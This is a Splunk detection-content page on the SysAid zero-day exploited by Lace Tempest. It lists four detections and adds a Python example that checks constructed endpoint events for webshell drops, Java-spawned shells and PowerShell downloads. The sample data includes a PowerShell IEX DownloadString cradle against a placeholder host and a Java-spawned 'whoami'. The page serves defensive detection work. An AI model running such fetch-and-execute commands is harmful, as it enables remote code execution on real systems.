Description

A zero-day vulnerability in SysAid's on-premise software was found being exploited by the group DEV-0950 (Lace Tempest). The attackers uploaded a WebShell and other payloads, gaining unauthorized access to and control over the affected system. SysAid has released a patch (version 23.3.36) to remediate the vulnerability and urges customers to conduct a comprehensive compromise assessment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2023-11-09
  • Author: Michael Haag, Splunk
  • ID: 228f22cb-3436-4c31-8af4-370d40af7b49

Narrative

The analytics tagged to this analytic story help capture initial access and some post-exploitation activity. In addition to the application spawning a shell, consider reviewing STRT's Cobalt Strike and PowerShell script block logging analytic stories.

On November 2nd, SysAid's security team identified a potential vulnerability in their on-premise software. The investigation revealed a zero-day vulnerability exploited by the group known as DEV-0950 (Lace Tempest). The attackers uploaded a WebShell and other payloads into the webroot of the SysAid Tomcat web service, thereby gaining unauthorized access to and control over the affected system. SysAid promptly initiated their incident response protocol and began proactive communication with their on-premise customers to implement a mitigation. SysAid has released a patch (version 23.3.36) to remediate the vulnerability and strongly recommends that all customers conduct a comprehensive compromise assessment of their network.

Detections

Name | Technique | Type
Any Powershell DownloadString | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP
Detect Webshell Exploit Behavior | Server Software Component, Web Shell | TTP
Java Writing JSP File | Exploit Public-Facing Application, External Remote Services | TTP
Windows Java Spawning Shells | Exploit Public-Facing Application, External Remote Services | TTP
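To show how three of the detections above map onto endpoint telemetry, here is an added Python example that is not Splunk's own SPL: a simplified stand-in for the Java-writing-JSP, Java-spawning-shell and PowerShell DownloadString checks, run over constructed events shaped like the Endpoint datamodel's Processes and Filesystem fields (the file paths, command lines and host details are invented).

```python
# Constructed sample events modelled on Splunk Endpoint datamodel fields; not real SysAid telemetry.
EVENTS = [
    {"dataset": "Filesystem", "process_name": "java.exe",
     "file_path": r"C:\SysAidServer\tomcat\webapps\usersfiles\user.jsp"},
    {"dataset": "Processes", "parent_process_name": "java.exe",
     "process_name": "cmd.exe", "process": "cmd.exe /c whoami"},
    {"dataset": "Processes", "parent_process_name": "explorer.exe",
     "process_name": "powershell.exe",
     "process": "powershell.exe -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"dataset": "Processes", "parent_process_name": "java.exe",
     "process_name": "javaw.exe", "process": "javaw.exe -jar tool.jar"},
    {"dataset": "Filesystem", "process_name": "java.exe",
     "file_path": r"C:\SysAidServer\tomcat\logs\catalina.log"},
]

JAVA = {"java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def java_writing_jsp(event):
    # Java (the Tomcat host process) creating a .jsp file: consistent with a webshell drop into the webroot.
    return (event["dataset"] == "Filesystem"
            and event["process_name"].lower() in JAVA
            and event["file_path"].lower().endswith(".jsp"))

def java_spawning_shell(event):
    # A command shell whose parent is the Java process hosting the web application.
    return (event["dataset"] == "Processes"
            and event["parent_process_name"].lower() in JAVA
            and event["process_name"].lower() in SHELLS)

def powershell_downloadstring(event):
    # PowerShell command line using DownloadString: ingress tool transfer.
    return (event["dataset"] == "Processes"
            and event["process_name"].lower() in {"powershell.exe", "pwsh.exe"}
            and "downloadstring" in event["process"].lower())

DETECTIONS = {
    "Java Writing JSP File": java_writing_jsp,
    "Windows Java Spawning Shells": java_spawning_shell,
    "Any Powershell DownloadString": powershell_downloadstring,
}

def run_detections(events):
    # Map each detection name to the indexes of the events it fires on.
    hits = {name: [] for name in DETECTIONS}
    for i, event in enumerate(events):
        for name, check in DETECTIONS.items():
            if check(event):
                hits[name].append(i)
    return hits
```

The two non-matching events (Java launching another Java process, Java writing a log file) show the benign Tomcat activity these checks are meant to leave alone.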

Reference

Version: 1